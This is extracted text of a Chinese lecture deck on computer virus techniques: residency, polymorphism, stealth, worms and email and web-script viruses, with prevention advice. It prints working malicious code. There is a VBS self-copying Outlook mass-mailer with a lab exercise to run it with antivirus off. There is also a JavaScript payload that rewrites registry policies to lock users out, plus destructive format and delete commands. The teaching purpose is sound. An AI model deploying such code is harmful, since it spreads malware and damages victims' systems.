计算机病毒技术特征

计算机病毒技术特征第一页，共七十四页，2022年，8月28日一、常见计算机病毒的技术特征

驻留内存病毒变种EPO（EntryPointObscuring）技术抗分析技术（加密、反跟踪）隐蔽性病毒技术多态性病毒技术

插入型病毒技术超级病毒技术第二页，共七十四页，2022年，8月28日破坏性感染技术病毒自动生产技术网络病毒技术第三页，共七十四页，2022年，8月28日1驻留内存:DOSTSRDOS系统区内存控制块（MCB）内存块1为病毒分配的内存块内存块2为病毒分配一块内存高端内存区域视频内存块中断向量表空闲区域病毒代码空闲区域空闲区域空闲区域DOS病毒驻留内存位置示意图第四页，共七十四页，2022年，8月28日1驻留内存：引导区病毒的内存驻留

大小在1K或者几K为了避免用户可以很容易的觉察到系统可用内存的减少，一些病毒会等待DOS完全启动成功，然后使用DOS自己的功能分配内存。不用考虑重载。第五页，共七十四页，2022年，8月28日1驻留内存：Windows环境下病毒的内存驻留三种驻留内存的方法由于Windows操作系统本身就是多任务的，所以最简单的内存驻留方法是将病毒作为一个应用程序，病毒拥有自己的窗口（可能是隐藏的）、拥有自己的消息处理函数；另外一种方法是使用DPMI申请一块系统内存，然后将病毒代码放到这块内存中；第三种方法是将病毒作为一个VXD（Win3.x或者Win9x环境下的设备驱动程序）或者在WinNT／Win2000下的设备驱动程序WDM加载到内存中运行。第六页，共七十四页，2022年，8月28日防止重载的方法传统的防止重入方法禁止启动两个实例对于VXD病毒静态加载时，病毒会在“SYSTEM.INI”文件中包含加载设备驱动程序的一行信息；动态加载时，可能使用某些英特尔CPU的一些特殊状态位来表示病毒是否存在于内存中（CIH病毒就采用了这种方法）。第七页，共七十四页，2022年，8月28日1驻留内存：宏病毒的内存驻留方法病毒随着宿主程序而被加载并且一直存在于系统中，所以从某种意义上，宏病毒都是内存驻留病毒。宏病毒通过检测自己的特征防止重入。第八页，共七十四页，2022年，8月28日2病毒变种变形变种——〉新品种两种方式：手工变种自动变种（MutationEngine：变形机）保加利亚的DarkAvenger的变形机最著名。第九页，共七十四页，2022年，8月28日分类第一类，具备普通病毒所具有的基本特性，然而，病毒每感染一个目标后，其自身代码与前一被感染目标中的病毒代码几乎没有三个连续的字节是相同的，但这些代码及其相对空间的排列位置是不变动的。这里称其为一维变形病毒。第二类，除了具备一维变形病毒的特性外，并且那些变化的代码相互间的排列距离（相对空间位置）也是变化的，有的感染文件的字节数不定。这里称其为二维变形病毒。第三类，具备二维变形病毒的特性，并且能分裂后分别潜藏在几处，随便某一处的子病毒被激发后都能自我恢复成一个完整的病毒。病毒在附着体上的空间位置是变化的，即潜藏的位置不定。例如，在某台机器中，病毒的一部分可能藏在机器硬盘的主引导区中，另外几部分也可能潜藏在可执行文件中，也可能潜藏在覆盖文件中，也可能潜藏在系统引导区，也可能另开垦一块区域潜藏等等。在另一台被感染的机器内，病毒可能又改变了其潜藏的位置。这里称其为三维变形病毒。第四类，具备三维变形病毒的特性，并且，这些特性随时间动态变化。例如，在染毒的机器中，刚开机时病毒在内存里变化为一个样子，一段时间后又变成了另一个样子，再次开机后病毒在内存里又是一个不同的样子。这里称其为四维变形病毒。第十页，共七十四页，2022年，8月28日3EPO（EntryPointObscuring）技术为什么要采用EPO技术呢？杀毒技术提高〉防止被发现〉EPO三种实现方法：最早的EPO通过改变程序入口处的代码实现的。简单但无用把宿主程序的任意位置的指令替换为跳转语句。难点在于定位一个完整的指令（类似于一个反编译器）PATCHIAT的函数。第十一页，共七十四页，2022年，8月28日如果在一段代码中有一条指令：228738fdff15eb0f107d

call

[7d100febh]

把它替换成新的指令Call[Addressofvirus]

在病毒体内还要再次调用Call[7d100febh]来完成宿主程序的功能。代码如下：

dwff15h;ff15eb0f107d的前缀

backaddrdd0;存放ff15eb0f107d的后缀，这个后缀是变化的在病毒代码中，把backaddr的值动态的改为Call[7d100febh]指令编译后的后缀。第十二页，共七十四页，2022年，8月28日4抗分析技术加密技术：这是一种防止静态分析的技术，使得分析者无法在不执行病毒的情况下，阅读加密过的病毒程序。反跟踪技术：使得分析者无法动态跟踪病毒程序的运行。Win95.Flagger病毒第十三页，共七十四页，2022年，8月28日4抗分析技术：自加密技术数据加密（信息加密）例如：6.4计算机病毒就是这样处理的，计算机病毒发作时将在屏幕上显示的字符串被用异或操作的方式加密存储。1575病毒加密数据文件。加密文件名COMMAND.COM病毒代码加密ChineseBomb把宿主程序前6个字节加密并转移位置。1701/1704用宿主程序的长度作为密钥加密代码。第十四页，共七十四页，2022年，8月28日4抗分析技术：反跟踪技术DOS下，修改int0-3中断Windows下：封锁键盘输入关闭屏幕显示修改堆栈指令程序运行计时动态地生成指令代码第十五页，共七十四页，2022年，8月28日5隐蔽性病毒技术引导型隐藏方法一感染时，修改中断服务程序使用时，截获INT13调用DOS应用程序原来的INT13H服务程序DOS下的杀毒软件病毒感染后的INT13H服务程序普通扇区普通扇区被病毒感染的扇区被病毒感染的扇区的原始扇区读扇区调用读请求读请求返回数据返回数据返回数据第十六页，共七十四页，2022年，8月28日引导型隐藏方法二针对杀毒软件对磁盘直接读写的特点。截获INT21H，然后恢复感染区最后，再进行感染DOS命令解释程序（COMMAND..COM）感染后的INT21H功能40H（加载一个程序执行）用户敲入AV.EXE执行反病毒程序恢复被病毒感染的扇区为原来的内容原来的INT21H功能重新感染扇区返回DOS命令解释程序（COMMAND..COM）第十七页，共七十四页，2022年，8月28日文件型病毒的隐藏技术拦截（API,INT调用）访问——〉恢复——〉再感染。例如，改变文件大小病毒，dir病毒等DOSINT21H调用INT13H（直接磁盘访问）列目录功能（FindFirst、FindNext）读写功能（Read、Write）执行功能（EXEC）其他功能（rename等）视窗操作系统下，支持长文件名的扩展DOS调用隐藏病毒扇区列目录时显示感染前的文件大小读写文件看到正常的文件内容执行或者搜索时隐藏病毒在支持长文件名的系统隐藏自身第十八页，共七十四页，2022年，8月28日宏病毒的隐藏技术删除相关的菜单项：“文件－>模板”或者“工具－>宏”使用宏病毒自己的FileTemplates和ToolsMacro宏替代系统缺省的宏第十九页，共七十四页，2022年，8月28日6多态性病毒技术多态病毒就是没有特殊特征码的病毒，这种病毒无法（或极难）用特征码扫描法检测到。方法：使用不固定的密钥或者随机数加密病毒代码运行的过程中改变病毒代码通过一些奇怪的指令序列实现多态性BASIC，Shell等解释性语言可以在一行包括很多语句。第二十页，共七十四页，2022年，8月28日使用加密技术的多态性MOVreg_1,countMOVreg_2,keyMOVreg_3,offsetLOOP：xxxbyteptr[reg_3]，reg_2DECreg_1JxxLOOP其中，reg_1、reg_2和reg_3是从AX、BX、CX、DX、SI、DI、BP中随机挑选的寄存器，感染不同的文件，解密代码使用随机的寄存器count是加密数据的长度，key是加密的密钥，offset是加密代码的偏移量，感染的时候，这些数值都是随机生成的，不同的感染都不一样xxx是XOR、ADD、SUB等不同运算指令的通称，使用什么运算指令是感染的时候随机选择的Jxx是ja、jnc等不同条件跳转指令的通称，使用什么跳转指令也是感染的时候随机选择的加密后的病毒代码第二十一页，共七十四页，2022年，8月28日改变可执行代码技术的多态病毒基本上都使用在宏病毒中，其他病毒少见。宏语言都是以BASIC为基础的。引导型病毒在引导区或者分区表中，包含了一小段代码来加载实际的病毒代码，这段代码在运行的过程中是可以改变的。文件型病毒“厚度”（Ply）病毒“TMC”病毒第二十二页，共七十四页，2022年，8月28日多态病毒的级别半多态：病毒拥有一组解密算法，感染的时候从中间随机的选择一种算法进行加密和感染。具有不动点的多态：病毒有一条或者几条语句是不变的（我们把这些不变的语句叫做不动点），其他病毒指令都是可变的。带有填充物的多态：解密代码中包含一些没有实际用途的代码来干扰分析者的视线。算法固定的多态：解密代码所使用的算法是固定的，但是实现这个算法的指令和指令的次序是可变的。算法可变的多态：使用了上述所有的技术，同时解密算法也是可以部分或者全部改变的。完全多态：算法多态，同时病毒体可以随机的分布在感染文件的各个位置，但是在运行的时候能够进行拼装，并且可以正常工作。第二十三页，共七十四页，2022年，8月28日查杀技术对于前面3种多态病毒，可以使用病毒特征码或者改进后的病毒特征码对于第4种多态病毒，可以增加多种情况的改进后的特征码至于第5和第6种多态病毒，依靠传统的特征码技术是完全无能为力的。最好的办法是虚拟执行技术。第二十四页，共七十四页，2022年，8月28日7插入型病毒技术DOS下较少PE病毒大多数都是插入型病毒例如，CIH第二十五页，共七十四页，2022年，8月28日8超级病毒技术超级病毒技术就是在计算机病毒进行感染、破坏时，使得病毒预防工具无法获得运行机会的病毒技术。技术较难实现。和杀毒技术相比，具有时效性。第二十六页，共七十四页，2022年，8月28日9破坏性感染技术破坏性感染病毒是针对计算机病毒消除技术的一项病毒技术。实例：Burge病毒是这类病毒的典型代表，该病毒会使宿主文件头部丢失560字节；Hahaha病毒会使宿主程序丢失13592字节。传播性差--〉破坏面小在潜伏期长的情况下，其传播性可以有所改观。第二十七页，共七十四页，2022年，8月28日10病毒自动生产技术针对病毒分析的技术两种类型：根据简单的操作，自动生成病毒（PE,宏病毒等）用自动生成技术实现变种（MutationEngine）第二十八页，共七十四页，2022年，8月28日11网络病毒技术网络病毒是指以网络为平台，对计算机产生安全威胁的所有程序的总和.常见的几种：木马病毒（Trojan）蠕虫病毒（Worm）

邮件病毒网页病毒第二十九页，共七十四页，2022年，8月28日二、流行病毒的关键技术

蠕虫病毒利用Outlook漏洞编写病毒Webpage中的恶意代码流氓软件第三十页，共七十四页，2022年，8月28日1蠕虫病毒蠕虫这个名词的由来是在1982年，Shock和Hupp根据《TheShockwaveRider》一书中的概念提出了一种“蠕虫（Worm）”程序的思想。蠕虫（Worm）是病毒的一种，它的传播通常不需要所谓的激活。它通过分布式网络来散播特定的信息或错误，进而造成网络服务遭到拒绝并发生死锁。具有病毒共性：如传播性、隐蔽性、破坏性等独有的性质：不利用文件寄生，对网络造成拒绝服务，以及和黑客技术相结合等等第三十一页，共七十四页，2022年，8月28日两类：一种是面向企业用户和局域网而言，这种病毒利用系统漏洞，主动进行攻击，可以对整个互联网可造成瘫痪性的后果。以“红色代码”、“尼姆达”以及最新的“SQL蠕虫王”为代表。另外一种是针对个人用户的，通过网络（主要是电子邮件、恶意网页形式）迅速传播的蠕虫病毒，以爱虫病毒、求职信病毒为代表。和普通病毒的区别：普通病毒蠕虫病毒存在形式寄存文件独立程序传染机制宿主程序运行主动攻击传染目标本地文件网络计算机第三十二页，共七十四页，2022年，8月28日蠕虫病毒的特性第一，利用漏洞主动进行攻击第二，病毒制作技术新第三，与黑客技术相结合，潜在的威胁和损失更大第四，传染方式多第五，传播速度快第六，清除难度大第七，破坏性强第三十三页，共七十四页，2022年，8月28日蠕虫病毒的机理蠕虫病毒由两部分组成：一个主程序和另一个是引导程序。主程序收集与当前机器联网的其他机器的信息。利用漏洞在远程机上建立引导程序。引导程序把“蠕虫”病毒带入了它所感染的每一台机器中。当前流行的病毒主要采用一些已公开漏洞、脚本、电子邮件等机制进行传播。例如，IRC,RPC等漏洞。第三十四页，共七十四页，2022年，8月28日蠕虫病毒实例MSN蠕虫病毒1.基本特征：名称：原始大小：188,928字节压缩形式：PESpin编写语言：MicrosoftVisualBasic6.0文件名称：LMAO.pif，LOL.scr，naked_drunk.pif等。第三十五页，共七十四页，2022年，8月28日2.行为分析：（1）蠕虫运行后，将释放一个名为CZ.EXE文件到C盘根目录，并将它拷贝到%system%目录下，文件名为winhost.exe。然后，将文件属性设置为隐藏、只读、系统，同时将该文件创建时间改成同系统文件日期一样，进行欺骗迷惑。同时蠕虫会在C盘跟目录随机生成一个文件，扩展名为PIF或EXE等，该文件用来向MSN好友传播。此外，病毒还会在%system%目录下生成msnus.exe，该文件为蠕虫自身拷贝。第三十六页，共七十四页，2022年，8月28日（2）将自身加入到注册表启动项目保证自身在系统重启动后被加载：位置：Software\Microsoft\Windows\CurrentVersion\Run键名：win32键值：winhost.exe位置：Software\Microsoft\Windows\CurrentVersion\RunServices键名：win32键值：winhost.exe第三十七页，共七十四页，2022年，8月28日（3）蠕虫病毒会在C盘根目录生成一个图片文件，名字为sexy.jpg，并调用jpg关联程序打开该图片。一般情况下，会用IE打开该图片，打开后效果如下图。（4）开启本地TCP10xx端口，频繁连接目标：28:8080，接受黑客控制。（5）查找MSN窗口，如果存在，则向好友列表中发送消息传播自身。第三十八页，共七十四页，2022年，8月28日3.防范方案：（1）手工清除。按照上面的行为分析，终止并删除相关进程文件，修复注册表。（2）用户可以避免接收MSN上发来的陌生附件，包括扩展名为EXE或SCR等的附件，来预防该蠕虫。第三十九页，共七十四页，2022年，8月28日如何防范蠕虫预防第一工具保护定期扫描你的系统更新你的防病毒软件不要轻易执行附件中的EXE和COM等可执行程序不要轻易打开附件中的文档文件第四十页，共七十四页，2022年，8月28日不要直接运行附件邮件程序设置谨用预览功能卸载ScriptingHost警惕发送出去的邮件第四十一页，共七十四页，2022年，8月28日2利用Outlook漏洞编写病毒

电子邮件成为新型病毒的重要载体利用Outlook漏洞传播的病毒：“爱虫（ILoveYou）”“美丽杀（Melissa）”宏病毒“库尔尼科娃”“主页(HomePage)”“欢乐时光（HappyTime）”第四十二页，共七十四页，2022年，8月28日邮件病毒分类附件方式：病毒的主要部分就隐藏在附件中。“主页(HomePage)”和“爱虫（ILoveYou）”病毒，它们的附件是VBS文件，也就是病毒关键部分。邮件本身：病毒并不置身于附件，而是藏身于邮件体之中。“欢乐时光（HappyTime）”病毒就是藏身于邮件体中，一旦用户将鼠标移至带毒邮件上，还未阅读邮件就已经中毒了。嵌入方式：病毒仅仅把电子邮件作为其传播手段。“美丽杀（Melissa）”是一种隐蔽性、传播性极大的Word97/2K宏病毒。尽管其核心内容是宏病毒，但在病毒体内有一块代码专门用来传播。当条件符合时，打开用户的电子邮件地址，向前50个地址发送被感染的邮件。第四十三页，共七十四页，2022年，8月28日电子邮件型病毒的传播原理自我复制Setfso=CreateObject("Scripting.FileSystemObject")fso.GetFile(WScript.ScriptFullName).Copy("C:\temp.vbs")这么两行代码就可以将自身复制到c盘根目录下temp.vbs这个文件。第四十四页，共七十四页，2022年，8月28日传播——电子邮件病毒是通过电子邮件传播的。Setola=CreateObject("Outlook.Application")OnErrorResumeNextForx=1To50SetMail=ola.CreateItem(0)Mail.to=ola.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)Mail.Subject="BetreffderE-Mail"Mail.Body="TextderE-Mail"Mail.Attachments.Add("C:\temp.vbs")Mail.SendNextola.Quit第四十五页，共七十四页，2022年，8月28日‘调整脚本语言的超时设置。

dimwscr,rr

setwscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout")

if(rr>=1)then

wscr.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout",0,"REG_DWORD"

endif

第四十六页，共七十四页，2022年，8月28日’修改注册表，使得每次系统启动时自动执行脚本

regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"

regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"‘MSKernel32.vbs和Win32DLL.vbs是病毒脚本的一个副本第四十七页，共七十四页，2022年，8月28日破坏性语句打开磁盘格式化窗口Setobj=Wscript.CreateObject(“Wscript.Shell”)Obj.Run“rundll32.exeshell32.dll,SHFormatDrive”打开Windows关闭窗口Setobj=Wscript.CreateObject(“Wscript.Application”)Obj.ShutdownWindows删除当前目录中所有的.exe文件Setobj=Wscript.CreateObject(“Wscript.Shell”)Obj.Run(“C/CDEL*.EXE,0,False”)写注册表(写入字符串“TestValue”)Setobj=Wscript.CreateObject(“Wscript.Shell”)Obj.RegWrite“HKey_Local_Machine\Software\Microsoft”,“TestValue”第四十八页，共七十四页，2022年，8月28日电子邮件型病毒预防第一，不要轻易打开陌生人来信中的附件文件。第二，对于比较熟悉的朋友们寄来的信件，也要注意其附件。第三，切忌盲目转发。第四，去掉Windows脚本执行功能，禁止VBS文件执行。第五，不要隐藏系统中已知文件类型的扩展名称。第六，将系统的网络连接的安全级别设置至少为“中等”.第七，利用工具。第四十九页，共七十四页，2022年，8月28日邮件型病毒实验【实验目的】掌握邮件型病毒基本原理【实验平台】WindowsXP操作系统Outlook邮件客户端第五十页，共七十四页，2022年，8月28日【实验步骤】Outlook设置用户帐号。Outlook地址薄添加联系人。在实验机器上的C：根目录下创建空文件test.vbs。关闭反病毒软件的实时防护功能。把实验代码录入到test.vbs文件里。运行脚本文件，程序启动Outlook（由于现在的Outlook版本较高，Outlook会提示是否允许操作，请选择允许）发送邮件。第五十一页，共七十四页，2022年，8月28日【注意事项】1.为了不给你的地址薄联系人传送垃圾邮件，你可以先将地址薄中的联系人导出，然后添入实验用邮件地址。实验结束后，再重新导入原来地址薄中的联系人。2.程序运行后，打开实验用邮箱查看实验结果。一般而言，由于现在的邮件服务器都会对邮件进行扫面，所以传送了病毒的邮件不能传送到邮箱。解决办法是：将程序中的一个语句ObjMail.Attachments.Add("c:\test.vbs")删除，或者将附件c:\test.vbs文件内容改为其他内容。第五十二页，共七十四页，2022年，8月28日Test.vbs的内容//codebeginSetobjOA=Wscript.CreateObject("Outlook.Application")SetobjMapi=objOA.GetNameSpace("MAPI")SetobjAddList=objMapi.AddressLists(i)SetobjMail=objOA.CreateItem(0)ObjMail.Recipients.Add(objAddList.AddressEntries(j))ObjMail.Subject="你好!"ObjMail.Body="这次给你的附件时我实验题！如果收到附件轻不要下载，不要打开。"ObjMail.Attachments.Add("c:\test.vbs")ObjMail.SentNextNextSetobjMapi=NothingSetobjOA=Nothing//codeend第五十三页，共七十四页，2022年，8月28日4Webpage中的恶意代码WebPage中的恶意代码主要是指某些网站使用的恶意代码。这些代码打着是给用户加深“印象”、提供“方便”的旗号做令人厌恶的事情。“万花谷”病毒第五十四页，共七十四页，2022年，8月28日脚本病毒基本类型第一，基于JAVAScript的脚本病毒第二，基于VBScript的脚本病毒可以在Office，浏览器、Outlook中运行,危害性较大。第三，基于PHP的脚本病毒第四，脚本语言和木马程序结合的病毒第五十五页，共七十四页，2022年，8月28日病毒的工作机理病毒利用了下面这段JavaScript代码修改了HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\和HKCU\Software\Microsoft\InternetExplorer\Main\中的WindowTitle这个键的值。同时，病毒还修改了用户的许多IE设置，如消除运行（RUN）按钮、消除关闭按钮、消除注销按钮、隐藏桌面、隐藏盘符、禁止注册表等。以下就是这个病毒的代码：第五十六页，共七十四页，2022年，8月28日document.write("");//该函数是现在收藏夹里增加一个站点

functionAddFavLnk(loc,DispName,SiteURL)

{

varShor=Shl.CreateShortcut(loc+"\\"+DispName+".URL");

Shor.TargetPath=SiteURL;

Shor.Save();

}//该函数是病毒的主函数，实现COOKIES检查、注册表修改等

functionf(){

try

{第五十七页，共七十四页，2022年，8月28日//声明一个ActiveX对象

ActiveXinitialization

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

//创建几个实例a1.createInstance();

Shl=a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

a1.createInstance();

FSO=a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Net=a1.GetObject();try

{

if(documents.cookies.indexOf("Chg")==-1)

{//设置IE起始页

Shl.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\StartPage",

"/");//设置COOKIES

varexpdate=newDate((newDate()).getTime()+(1));

documents.cookies="Chg=general;expires="+expdate.toGMTString()+";path=/;"第五十八页，共七十四页，2022年，8月28日//消除RUN按钮

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies

\\Explorer\\NoRun",01,"REG_BINARY");//消除关闭按钮

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies

\\Explorer\\NoClose",01,"REG_BINARY");//消除注销按钮

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies

\\Explorer\\NoLogOff",01,"REG_BINARY");//隐藏盘符

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies

\\Explorer\\NoDrives","63000000","REG_DWORD");//禁止注册表

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies

\\System\\DisableRegistryTools","00000001","REG_DWORD");//禁止运行DOS程序

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies

\\WinOldApp\\Disabled","00000001","REG_DWORD");第五十九页，共七十四页，2022年，8月28日//禁止进入DOS模式Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies

\\WinOldApp\\NoRealMode","00000001","REG_DWORD");//开机提示窗口标题

Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon

\\LegalNoticeCaption","你已经中毒…");//开机提示窗口信息

Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon

\\LegalNoticeText","你已经中毒…");

//设置IE标题

Shl.RegWrite("HKLM\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle",

"你已经中毒…");

Shl.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle",

"你已经中毒…");

}

}

catch(e)

{}

}

catch(e)

{}

}//初始化函数

functioninit()

{

setTimeout("f()",1000);

}

//开始执行

init();第六十页，共七十四页，2022年，8月28日网络炸弹//首先声明插入脚本为JavaScript<scriptlanguage="JavaScript">//定义不断打开新窗口的函数openwindows()，所带参数表明打开窗口数量functionopenwindows(number){//循环

for(i=0;i<number;i++){//指定的页面

window.open("temp.jsp"); }}</script>//脚本结束标志第六十一页，共七十四页，2022年，8月28日类“万花筒病毒”‘声明脚本为VBScript<SCRIPTlanguage='vbscript'>‘定义函数runVirus()FunctionrunVirus()‘实验中弹出对话框告知学员病毒进程msgbox("将要修改主页了！") ‘执行注册表改写1，把IE主键修改成★YourHomePage★Rw"HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\StartPage","★YourHomePage★","REG_SZ"msgbox("修改主页完成，查看一下吧！")msgbox("将要隐藏A盘盘符！")‘执行注册表改写2：隐藏A盘盘符第六十二页，共七十四页，2022年，8月28日RwHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives","00000001","REG_DWORD"msgbox("A盘盘符消失！")msgbox("注册表工具将要被禁用！")‘执行注册表改写3：禁用注册表编辑器Rw"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"msgbox("注册表工具禁用！")EndFunction第六十三页，共七十四页，2022年，8月28日‘注册表写函数SubRw(k,v,t)DimROnErrorResumeNext‘关键步骤，调用WScript.Shell对象来获得修改权利SetR=CreateObject("WScript.Shell")‘调用WScript.Shell的方法来写注册表R.RegWritek,v,tEndSub第六十四页，共七十四页，2022年，8月